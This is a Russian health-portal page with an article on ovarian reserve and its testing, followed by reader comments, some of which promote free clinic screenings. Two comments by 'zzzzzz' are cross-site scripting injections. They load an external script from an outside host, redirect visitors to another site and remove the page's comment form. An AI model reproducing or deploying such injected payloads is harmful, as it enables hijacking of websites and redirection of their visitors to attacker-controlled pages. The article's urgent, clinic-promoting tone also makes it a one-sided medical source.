Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Осталось ли у вас время с...  >>  Осталось ли у вас время стать мамой?! Овариальный резерв
 
Обратная связь
 

Осталось ли у вас время стать мамой?! Овариальный резерв

Размер шрифта
29 апреля 2013 00:00
  • google_analytics: false
  • Нравится

Осталось ли у вас время стать мамой?! Овариальный резерв

Зачем нужно это знать?

Многие из нас не задумываются, а есть ли у нас возможность стать мамой?

Жизненные обстоятельства: карьера, учеба, хобби, квартирный вопрос, или просто нет того человека, с кем бы хотелось это сделать, состояние здоровья, материальные условия – все это влияет на принятие судьбоносного решения о беременности. Если вы не хотите остаться «у разбитого корыта» – вам нужно проверить свой овариальный резерв и узнать есть ли у вас время еще откладывать материнство или уже пора задуматься об этом сейчас, чтобы не было мучительно больно потом…

Все фолликулы (молодые яйцеклетки в оболочке) закладываются в яичниках еще ДО рождения девочки, на 3-4 месяце беременности их уже около 7 миллионов, к моменту рождения их будет миллион, а до первых месячных доживут всего 250-300 тысяч фолликулов. С каждым годом их будет становиться всё меньше и меньше и наступит менопауза.

За жизнь у женщины до овуляции доходят всего 400-500 фолликулов, а все остальные атрезируются, то есть, погибают. Этот запас и называется овариальным резервом яичника, который и определяет сколько у вас осталось шансов забеременеть.

Проведенные в последние годы исследования показали, что скорость исчезновения фолликулов удваивается, когда их число достигает отметки в 25000, что обычно соответствует возрасту 37,5 лет. Этот возраст определяется как критический, после которого овариальный резерв резко снижается.

Как можно оценить овариальный резерв?

Простой анализ крови на фолликулостимулирующий гормон (ФСГ) и лютеинизирующий гормон (ЛГ). Эти гормоны производятся гипофизом (крошечная железа, расположенная в головном мозге) и контролирует менструальный цикл женщины (овуляцию и менструацию). Их повышение свидетельствует о том, что нужно больше сил для активации овуляции из-за низкого овариального резерва. Повышение ФСГ на третий день менструального цикла может свидетельствовать о снижении овариального резерва и появляется за 5-6 лет до наступления менопаузы.

Кроме того, вы можете измерить уровень эстрадиола. Он относится к группе эстрогенов, важнейших женских половых гормонов. Продуцируется эстрадиол клетками оболочки фолликула и, в меньшей степени, надпочечниками. Повышение его среднего уровня указывает на то, что фолликулы плохо реагируют на гормональную стимуляцию, а значит – овуляция будет затруднена.

К другим, менее распространенным гормональным анализам, характеризующим состояние овариального резерва, относят измерение концентрации ингибина В и антимюллерова гормона.

Также для оценки овариального резерва используется УЗИ: если яичники на ультразвуке маленькие, количество антральных (то есть почти зрелых) фолликулов меньше, чем должно быть, а интенсивность кровотока снижена – значит, состояние овариального резерва далеко от идеала.

Задумайтесь о будущем сегодня, измерьте свой овариальный резерв!!!

Узнать есть ли у вас время, чтобы стать мамой вы можете в любой клинике из раздела «Куда обратиться».

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - Гость

01 мая 2013 в 06:26

Комментарий удален за нарушение Правил общения

2 - Гость

16 мая 2013 в 23:36

Цитировать   |   Пожаловаться

Добрый день! сегодня благодаря этой статье прошла бесплатное обследование в Клинике "Новая Жизнь" и осталась под огромным впечатлением. Мне сделали УЗИ, а на второй день цикла потребуется сдать анализ крови. Милые женщины, особенно те, кому "за 30", не упускайте возможность, пока идет акция до 6 июня, выбирайте из списка удобную для Вас клинику и смело проходите обследование. Знание не помешает - это точно.

Анна.

3 - Гость

08 июня 2013 в 12:12

Цитировать   |   Пожаловаться

А в Петровских воротах бесплатная акция и продолжается

4 - Лариса

25 июля 2013 в 04:47

Цитировать   |   Пожаловаться

Здравствуйте, а где можно посмотреть этот список клиник?

5 - Гость

29 августа 2013 в 20:39

Цитировать   |   Пожаловаться

Я слышала, что можно по программе бесплатно определить овариальный резерв. Продолжается ли эта программа? Заранее благодарна за ответ.

Лариса 25 июля 2013 в 04:47
Здравствуйте, а где можно посмотреть этот список клиник?

Гость 29 августа 2013 в 20:39
по программе бесплатно определить овариальный резерв.
 Простите, не поняла Вашего вопроса. Какую программу Вы имеете ввиду? 

8 - zzzzzz

30 июня 2015 в 19:34

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

9 - zzzzzz

30 июня 2015 в 23:19

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

10 - Гость

12 октября 2015 в 14:57

Цитировать   |   Пожаловаться

Для определения овариального резерва перед проведением ВРТ в клиническом госпитале на Яузе мне делали УЗИ, а также брали кровь на гормоны. По результатам анализов - все не так плохо как я ожидала, еще есть небольшой запас времени, чтобы стать мамой.

Статьи

       
Женская репродуктивная система   Менструальные болезни. Эндометриоз   Ученые обнаружили причину самого частого женского заболевания   О чем молчат женщины…  
29 декабря 2012Аспирин снижает риск развития рака яичников 06 декабря 2012Теперь бросить курить – проще простого
 
12 октября 2012Яичный желток опасен для сосудов так же, как курение! 09 октября 2012Пассивное курение «убивает» вашу память!
 

Слайдшоу

1
Что вызывает бесплодие у женщин
Рак яичников
Месячные: что ненормально?

Тесты

1
Что вы знаете об СДВГ?
Сколько вы проживете?
Легкие: что вы о них знаете?
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.